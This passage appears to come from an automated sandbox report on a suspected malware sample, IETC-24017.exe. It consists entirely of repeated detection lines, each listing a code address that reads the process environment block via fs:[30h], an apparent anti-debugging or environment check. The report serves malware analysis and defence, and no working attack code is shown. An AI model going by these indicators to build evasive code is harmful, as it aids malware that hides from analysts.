                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018227ED mov eax, dword ptr fs:[00000030h]3_2_018227ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018047FB mov eax, dword ptr fs:[00000030h]3_2_018047FB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018047FB mov eax, dword ptr fs:[00000030h]3_2_018047FB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C700 mov eax, dword ptr fs:[00000030h]3_2_0183C700
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800710 mov eax, dword ptr fs:[00000030h]3_2_01800710
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01830710 mov eax, dword ptr fs:[00000030h]3_2_01830710
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C720 mov eax, dword ptr fs:[00000030h]3_2_0183C720
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C720 mov eax, dword ptr fs:[00000030h]3_2_0183C720
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187C730 mov eax, dword ptr fs:[00000030h]3_2_0187C730
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183273C mov eax, dword ptr fs:[00000030h]3_2_0183273C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183273C mov ecx, dword ptr fs:[00000030h]3_2_0183273C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183273C mov eax, dword ptr fs:[00000030h]3_2_0183273C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183674D mov esi, dword ptr fs:[00000030h]3_2_0183674D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183674D mov eax, dword ptr fs:[00000030h]3_2_0183674D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183674D mov eax, dword ptr fs:[00000030h]3_2_0183674D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800750 mov eax, dword ptr fs:[00000030h]3_2_01800750
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842750 mov eax, dword ptr fs:[00000030h]3_2_01842750
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842750 mov eax, dword ptr fs:[00000030h]3_2_01842750
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188E75D mov eax, dword ptr fs:[00000030h]3_2_0188E75D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01884755 mov eax, dword ptr fs:[00000030h]3_2_01884755
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808770 mov eax, dword ptr fs:[00000030h]3_2_01808770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810770 mov eax, dword ptr fs:[00000030h]3_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804690 mov eax, dword ptr fs:[00000030h]3_2_01804690
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804690 mov eax, dword ptr fs:[00000030h]3_2_01804690
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C6A6 mov eax, dword ptr fs:[00000030h]3_2_0183C6A6
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018366B0 mov eax, dword ptr fs:[00000030h]3_2_018366B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0183A6C7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A6C7 mov eax, dword ptr fs:[00000030h]3_2_0183A6C7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E6F2 mov eax, dword ptr fs:[00000030h]3_2_0187E6F2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E6F2 mov eax, dword ptr fs:[00000030h]3_2_0187E6F2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E6F2 mov eax, dword ptr fs:[00000030h]3_2_0187E6F2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E6F2 mov eax, dword ptr fs:[00000030h]3_2_0187E6F2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018806F1 mov eax, dword ptr fs:[00000030h]3_2_018806F1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018806F1 mov eax, dword ptr fs:[00000030h]3_2_018806F1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181260B mov eax, dword ptr fs:[00000030h]3_2_0181260B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181260B mov eax, dword ptr fs:[00000030h]3_2_0181260B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181260B mov eax, dword ptr fs:[00000030h]3_2_0181260B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181260B mov eax, dword ptr fs:[00000030h]3_2_0181260B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181260B mov eax, dword ptr fs:[00000030h]3_2_0181260B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181260B mov eax, dword ptr fs:[00000030h]3_2_0181260B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181260B mov eax, dword ptr fs:[00000030h]3_2_0181260B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E609 mov eax, dword ptr fs:[00000030h]3_2_0187E609
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842619 mov eax, dword ptr fs:[00000030h]3_2_01842619
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01836620 mov eax, dword ptr fs:[00000030h]3_2_01836620
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01838620 mov eax, dword ptr fs:[00000030h]3_2_01838620
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E627 mov eax, dword ptr fs:[00000030h]3_2_0181E627
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180262C mov eax, dword ptr fs:[00000030h]3_2_0180262C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181C640 mov eax, dword ptr fs:[00000030h]3_2_0181C640
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C866E mov eax, dword ptr fs:[00000030h]3_2_018C866E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C866E mov eax, dword ptr fs:[00000030h]3_2_018C866E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A660 mov eax, dword ptr fs:[00000030h]3_2_0183A660
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A660 mov eax, dword ptr fs:[00000030h]3_2_0183A660
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01832674 mov eax, dword ptr fs:[00000030h]3_2_01832674
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A0 mov eax, dword ptr fs:[00000030h]3_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018009AD mov eax, dword ptr fs:[00000030h]3_2_018009AD
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018009AD mov eax, dword ptr fs:[00000030h]3_2_018009AD
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018889B3 mov esi, dword ptr fs:[00000030h]3_2_018889B3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018889B3 mov eax, dword ptr fs:[00000030h]3_2_018889B3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018889B3 mov eax, dword ptr fs:[00000030h]3_2_018889B3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018969C0 mov eax, dword ptr fs:[00000030h]3_2_018969C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A9D0 mov eax, dword ptr fs:[00000030h]3_2_0180A9D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A9D0 mov eax, dword ptr fs:[00000030h]3_2_0180A9D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A9D0 mov eax, dword ptr fs:[00000030h]3_2_0180A9D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A9D0 mov eax, dword ptr fs:[00000030h]3_2_0180A9D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A9D0 mov eax, dword ptr fs:[00000030h]3_2_0180A9D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A9D0 mov eax, dword ptr fs:[00000030h]3_2_0180A9D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018349D0 mov eax, dword ptr fs:[00000030h]3_2_018349D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CA9D3 mov eax, dword ptr fs:[00000030h]3_2_018CA9D3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F8918 mov eax, dword ptr fs:[00000030h]3_2_017F8918
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F8918 mov eax, dword ptr fs:[00000030h]3_2_017F8918
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188E9E0 mov eax, dword ptr fs:[00000030h]3_2_0188E9E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018329F9 mov eax, dword ptr fs:[00000030h]3_2_018329F9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018329F9 mov eax, dword ptr fs:[00000030h]3_2_018329F9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E908 mov eax, dword ptr fs:[00000030h]3_2_0187E908
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E908 mov eax, dword ptr fs:[00000030h]3_2_0187E908
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188C912 mov eax, dword ptr fs:[00000030h]3_2_0188C912
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188892A mov eax, dword ptr fs:[00000030h]3_2_0188892A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0189892B mov eax, dword ptr fs:[00000030h]3_2_0189892B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01880946 mov eax, dword ptr fs:[00000030h]3_2_01880946
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01826962 mov eax, dword ptr fs:[00000030h]3_2_01826962
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01826962 mov eax, dword ptr fs:[00000030h]3_2_01826962
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01826962 mov eax, dword ptr fs:[00000030h]3_2_01826962
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184096E mov eax, dword ptr fs:[00000030h]3_2_0184096E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184096E mov edx, dword ptr fs:[00000030h]3_2_0184096E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184096E mov eax, dword ptr fs:[00000030h]3_2_0184096E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A4978 mov eax, dword ptr fs:[00000030h]3_2_018A4978
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A4978 mov eax, dword ptr fs:[00000030h]3_2_018A4978
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188C97C mov eax, dword ptr fs:[00000030h]3_2_0188C97C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800887 mov eax, dword ptr fs:[00000030h]3_2_01800887
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188C89D mov eax, dword ptr fs:[00000030h]3_2_0188C89D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E8C0 mov eax, dword ptr fs:[00000030h]3_2_0182E8C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CA8E4 mov eax, dword ptr fs:[00000030h]3_2_018CA8E4
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C8F9 mov eax, dword ptr fs:[00000030h]3_2_0183C8F9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C8F9 mov eax, dword ptr fs:[00000030h]3_2_0183C8F9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188C810 mov eax, dword ptr fs:[00000030h]3_2_0188C810
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A483A mov eax, dword ptr fs:[00000030h]3_2_018A483A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A483A mov eax, dword ptr fs:[00000030h]3_2_018A483A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A830 mov eax, dword ptr fs:[00000030h]3_2_0183A830
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01822835 mov eax, dword ptr fs:[00000030h]3_2_01822835
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01822835 mov eax, dword ptr fs:[00000030h]3_2_01822835
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01822835 mov eax, dword ptr fs:[00000030h]3_2_01822835
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01822835 mov ecx, dword ptr fs:[00000030h]3_2_01822835
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01822835 mov eax, dword ptr fs:[00000030h]3_2_01822835
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01822835 mov eax, dword ptr fs:[00000030h]3_2_01822835
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01812840 mov ecx, dword ptr fs:[00000030h]3_2_01812840
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01830854 mov eax, dword ptr fs:[00000030h]3_2_01830854
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804859 mov eax, dword ptr fs:[00000030h]3_2_01804859
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804859 mov eax, dword ptr fs:[00000030h]3_2_01804859
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01896870 mov eax, dword ptr fs:[00000030h]3_2_01896870
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01896870 mov eax, dword ptr fs:[00000030h]3_2_01896870
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188E872 mov eax, dword ptr fs:[00000030h]3_2_0188E872
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188E872 mov eax, dword ptr fs:[00000030h]3_2_0188E872
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FCB7E mov eax, dword ptr fs:[00000030h]3_2_017FCB7E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B4BB0 mov eax, dword ptr fs:[00000030h]3_2_018B4BB0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B4BB0 mov eax, dword ptr fs:[00000030h]3_2_018B4BB0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810BBE mov eax, dword ptr fs:[00000030h]3_2_01810BBE
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810BBE mov eax, dword ptr fs:[00000030h]3_2_01810BBE
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01820BCB mov eax, dword ptr fs:[00000030h]3_2_01820BCB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01820BCB mov eax, dword ptr fs:[00000030h]3_2_01820BCB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01820BCB mov eax, dword ptr fs:[00000030h]3_2_01820BCB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800BCD mov eax, dword ptr fs:[00000030h]3_2_01800BCD
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800BCD mov eax, dword ptr fs:[00000030h]3_2_01800BCD
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800BCD mov eax, dword ptr fs:[00000030h]3_2_01800BCD
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AEBD0 mov eax, dword ptr fs:[00000030h]3_2_018AEBD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808BF0 mov eax, dword ptr fs:[00000030h]3_2_01808BF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808BF0 mov eax, dword ptr fs:[00000030h]3_2_01808BF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808BF0 mov eax, dword ptr fs:[00000030h]3_2_01808BF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188CBF0 mov eax, dword ptr fs:[00000030h]3_2_0188CBF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182EBFC mov eax, dword ptr fs:[00000030h]3_2_0182EBFC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187EB1D mov eax, dword ptr fs:[00000030h]3_2_0187EB1D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182EB20 mov eax, dword ptr fs:[00000030h]3_2_0182EB20
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182EB20 mov eax, dword ptr fs:[00000030h]3_2_0182EB20
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C8B28 mov eax, dword ptr fs:[00000030h]3_2_018C8B28
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C8B28 mov eax, dword ptr fs:[00000030h]3_2_018C8B28
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B4B4B mov eax, dword ptr fs:[00000030h]3_2_018B4B4B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B4B4B mov eax, dword ptr fs:[00000030h]3_2_018B4B4B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A8B42 mov eax, dword ptr fs:[00000030h]3_2_018A8B42
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01896B40 mov eax, dword ptr fs:[00000030h]3_2_01896B40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01896B40 mov eax, dword ptr fs:[00000030h]3_2_01896B40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CAB40 mov eax, dword ptr fs:[00000030h]3_2_018CAB40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AEB50 mov eax, dword ptr fs:[00000030h]3_2_018AEB50
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA80 mov eax, dword ptr fs:[00000030h]3_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4A80 mov eax, dword ptr fs:[00000030h]3_2_018D4A80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01838A90 mov edx, dword ptr fs:[00000030h]3_2_01838A90
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808AA0 mov eax, dword ptr fs:[00000030h]3_2_01808AA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808AA0 mov eax, dword ptr fs:[00000030h]3_2_01808AA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01856AA4 mov eax, dword ptr fs:[00000030h]3_2_01856AA4
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01856ACC mov eax, dword ptr fs:[00000030h]3_2_01856ACC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01856ACC mov eax, dword ptr fs:[00000030h]3_2_01856ACC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01856ACC mov eax, dword ptr fs:[00000030h]3_2_01856ACC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800AD0 mov eax, dword ptr fs:[00000030h]3_2_01800AD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01834AD0 mov eax, dword ptr fs:[00000030h]3_2_01834AD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01834AD0 mov eax, dword ptr fs:[00000030h]3_2_01834AD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183AAEE mov eax, dword ptr fs:[00000030h]3_2_0183AAEE
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183AAEE mov eax, dword ptr fs:[00000030h]3_2_0183AAEE
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188CA11 mov eax, dword ptr fs:[00000030h]3_2_0188CA11
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183CA24 mov eax, dword ptr fs:[00000030h]3_2_0183CA24
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182EA2E mov eax, dword ptr fs:[00000030h]3_2_0182EA2E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01824A35 mov eax, dword ptr fs:[00000030h]3_2_01824A35
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01824A35 mov eax, dword ptr fs:[00000030h]3_2_01824A35
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806A50 mov eax, dword ptr fs:[00000030h]3_2_01806A50
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806A50 mov eax, dword ptr fs:[00000030h]3_2_01806A50
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806A50 mov eax, dword ptr fs:[00000030h]3_2_01806A50
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806A50 mov eax, dword ptr fs:[00000030h]3_2_01806A50
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806A50 mov eax, dword ptr fs:[00000030h]3_2_01806A50
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806A50 mov eax, dword ptr fs:[00000030h]3_2_01806A50
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806A50 mov eax, dword ptr fs:[00000030h]3_2_01806A50
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810A5B mov eax, dword ptr fs:[00000030h]3_2_01810A5B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810A5B mov eax, dword ptr fs:[00000030h]3_2_01810A5B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AEA60 mov eax, dword ptr fs:[00000030h]3_2_018AEA60
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183CA6F mov eax, dword ptr fs:[00000030h]3_2_0183CA6F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183CA6F mov eax, dword ptr fs:[00000030h]3_2_0183CA6F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183CA6F mov eax, dword ptr fs:[00000030h]3_2_0183CA6F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187CA72 mov eax, dword ptr fs:[00000030h]3_2_0187CA72
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187CA72 mov eax, dword ptr fs:[00000030h]3_2_0187CA72
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4DAD mov eax, dword ptr fs:[00000030h]3_2_018D4DAD
